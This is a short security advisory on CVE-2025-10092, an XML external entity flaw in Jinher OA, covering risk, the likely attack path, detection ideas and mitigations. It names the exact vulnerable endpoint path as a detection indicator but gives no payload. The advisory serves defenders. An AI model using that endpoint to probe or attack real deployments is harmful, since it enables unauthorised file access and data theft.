CVE Alert: CVE-2025-10092 – Jinher – OA

Risk verdict

High risk: remote, unauthenticated exploitation is possible with a publicly available PoC, enabling potential data exposure or manipulation.

Why this matters

The vulnerability affects a web-facing XML handler, enabling external entity processing. This can lead to disclosure of local/internal data or server-side impact without user interaction, impacting confidentiality and potentially availability.

Most likely attack path

Attacker requires no credentials and can trigger the flaw over the network via crafted XML to the web endpoint. The XML parser would resolve external entities, risking data exfiltration or local file access; limited impact per CVSS on integrity and availability, but combined with external access and public PoC, prone to automated scanning and rapid exploitation.

Who is most exposed

Enterprise deployments of Jinher OA with web interfaces (XML Handler) on internal networks or internet-facing gateways are at risk, particularly where network segmentation is weak and admin controls are lax.

Detection ideas

• Unusual outbound connections or file reads triggered by XML payloads to local or internal hosts.
• Logs showing errors or exceptions referencing external entities during AddTask.aspx requests.
• Anomalous XML payloads targeting /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add.
• Indicators from CTI signatures or PoC references in application logs.
• Increased authentication failures or remote probing activity targeting the OA web interface.

Mitigation and prioritisation

• Apply the latest vendor patch or upgrade to a fixed build; verify patch availability for all affected versions.
• Disable or restrict external entity processing in the XML parser where feasible; harden XML handling configuration.
• Implement network controls: restrict OA web access, add WAF rules to block XXE patterns, and monitor for suspicious XML requests.
• Enable strict input validation and XML schema enforcement; review file access permissions.
• Change-management: test fixes in staging before production; consider interim compensating controls if patch delays occur. If KEV is confirmed or EPSS ≥ 0.5, treat as priority 1.